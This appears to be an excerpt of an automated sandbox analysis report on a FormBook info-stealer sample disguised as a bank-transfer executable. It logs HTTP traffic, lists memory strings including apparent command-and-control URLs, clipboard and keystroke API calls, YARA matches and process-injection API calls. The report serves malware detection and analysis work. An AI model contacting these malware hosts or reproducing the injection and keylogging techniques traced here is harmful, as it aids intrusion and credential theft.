74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 Mar 2025 08:32:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 Mar 2025 08:32:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 12 Mar 2025 08:33:02 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 12 Mar 2025 08:33:05 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 Mar 2025 08:34:10 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 Mar 2025 08:34:12 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 Mar 2025 08:34:15 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 Mar 2025 08:34:18 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: 6tskSK4rGcXjRtb8E.exe, 00000007.00000002.3850615861.0000000004D0C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.corsix.xyz
Source: 6tskSK4rGcXjRtb8E.exe, 00000007.00000002.3850615861.0000000004D0C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.corsix.xyz/vfs3/
Source: msfeedssync.exe, 00000006.00000002.3851887996.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: msfeedssync.exe, 00000006.00000002.3851887996.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msfeedssync.exe, 00000006.00000002.3851887996.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msfeedssync.exe, 00000006.00000002.3851887996.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msfeedssync.exe, 00000006.00000002.3851887996.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: msfeedssync.exe, 00000006.00000002.3851887996.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msfeedssync.exe, 00000006.00000002.3851887996.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: msfeedssync.exe, 00000006.00000002.3851887996.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: msfeedssync.exe, 00000006.00000003.1824355549.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000002.3847343312.0000000002E74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: msfeedssync.exe, 00000006.00000003.1824355549.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000002.3847343312.0000000002E74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: msfeedssync.exe, 00000006.00000003.1824355549.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: msfeedssync.exe, 00000006.00000002.3847343312.0000000002E74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: msfeedssync.exe, 00000006.00000003.1824355549.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: msfeedssync.exe, 00000006.00000002.3847343312.0000000002E4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: msfeedssync.exe, 00000006.00000003.1824355549.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000002.3847343312.0000000002E74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: msfeedssync.exe, 00000006.00000002.3847343312.0000000002E4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: msfeedssync.exe, 00000006.00000003.1819269177.0000000007D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: msfeedssync.exe, 00000006.00000002.3851887996.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: msfeedssync.exe, 00000006.00000002.3849269128.00000000044CE000.00000004.10000000.00040000.00000000.sdmp, msfeedssync.exe, 00000006.00000002.3851408918.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000007.00000002.3848522708.00000000033FE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msfeedssync.exe, 00000006.00000002.3851887996.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
Source: msfeedssync.exe, 00000006.00000002.3849269128.0000000004CA8000.00000004.10000000.00040000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000007.00000002.3848522708.0000000003BD8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.seasay.xyz/36xs/?5D6d=cV08QN8xl6&Oj=RgfpXspOgsNiHmosVF1KbpPv72dzNmiTBjL/Nd6qGeZ/g3rBomzg
Source: msfeedssync.exe, 00000006.00000002.3849269128.0000000004CA8000.00000004.10000000.00040000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000007.00000002.3848522708.0000000003BD8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.seasay.xyz/36xs/?5D6d=cV08QN8xl6&Oj=RgfpXspOgsNiHmosVF1KbpPv72dzNmiTBjL/Nd6qGeZ/g3rB

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_006A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_006A4164

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_006A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_006A4164

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_006A3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_006A3F66

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_0069001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0069001C

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_006BCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_006BCABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3850615861.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3848322186.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3847177486.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1633217878.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1632740851.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3848223982.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3848379688.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1637325490.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00633B3A
Source: Transferencia 6997900002017937.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Transferencia 6997900002017937.exe, 00000000.00000000.1365065170.00000000006E4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_1fd5e2ae-4
Source: Transferencia 6997900002017937.exe, 00000000.00000000.1365065170.00000000006E4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_38481b07-4
Source: Transferencia 6997900002017937.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f1fc3c13-2
Source: Transferencia 6997900002017937.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_011e56fa-0

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042C763 NtClose,	1_2_0042C763
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772B60 NtClose,LdrInitializeThunk,	1_2_03772B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03772DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_03772C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037735C0 NtCreateMutant,LdrInitializeThunk,	1_2_037735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03774340 NtSetContextThread,	1_2_03774340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03774650 NtSuspendThread,	1_2_03774650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772BF0 NtAllocateVirtualMemory,	1_2_03772BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772BE0 NtQueryValueKey,	1_2_03772BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772BA0 NtEnumerateValueKey,	1_2_03772BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772B80 NtQueryInformationFile,	1_2_03772B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772AF0 NtWriteFile,	1_2_03772AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772AD0 NtReadFile,	1_2_03772AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772AB0 NtWaitForSingleObject,	1_2_03772AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772F60 NtCreateProcessEx,	1_2_03772F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772F30 NtCreateSection,	1_2_03772F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772FE0 NtCreateFile,	1_2_03772FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772FB0 NtResumeThread,	1_2_03772FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772FA0 NtQuerySection,	1_2_03772FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772F90 NtProtectVirtualMemory,	1_2_03772F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772E30 NtWriteVirtualMemory,	1_2_03772E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772EE0 NtQueueApcThread,	1_2_03772EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772EA0 NtAdjustPrivilegesToken,	1_2_03772EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772E80 NtReadVirtualMemory,	1_2_03772E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772D30 NtUnmapViewOfSection,	1_2_03772D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772D10 NtMapViewOfSection,	1_2_03772D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772D00 NtSetInformationFile,	1_2_03772D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772DD0 NtDelayExecution,	1_2_03772DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772DB0 NtEnumerateKey,	1_2_03772DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772C60 NtCreateKey,	1_2_03772C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772C00 NtQueryInformationProcess,	1_2_03772C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772CF0 NtOpenProcess,	1_2_03772CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772CC0 NtQueryVirtualMemory,	1_2_03772CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772CA0 NtQueryInformationToken,	1_2_03772CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03773010 NtOpenDirectoryObject,	1_2_03773010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03773090 NtSetValueKey,	1_2_03773090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037739B0 NtGetContextThread,	1_2_037739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03773D70 NtOpenThread,	1_2_03773D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03773D10 NtOpenProcessToken,	1_2_03773D10
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03354340 NtSetContextThread,LdrInitializeThunk,	6_2_03354340
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03354650 NtSuspendThread,LdrInitializeThunk,	6_2_03354650
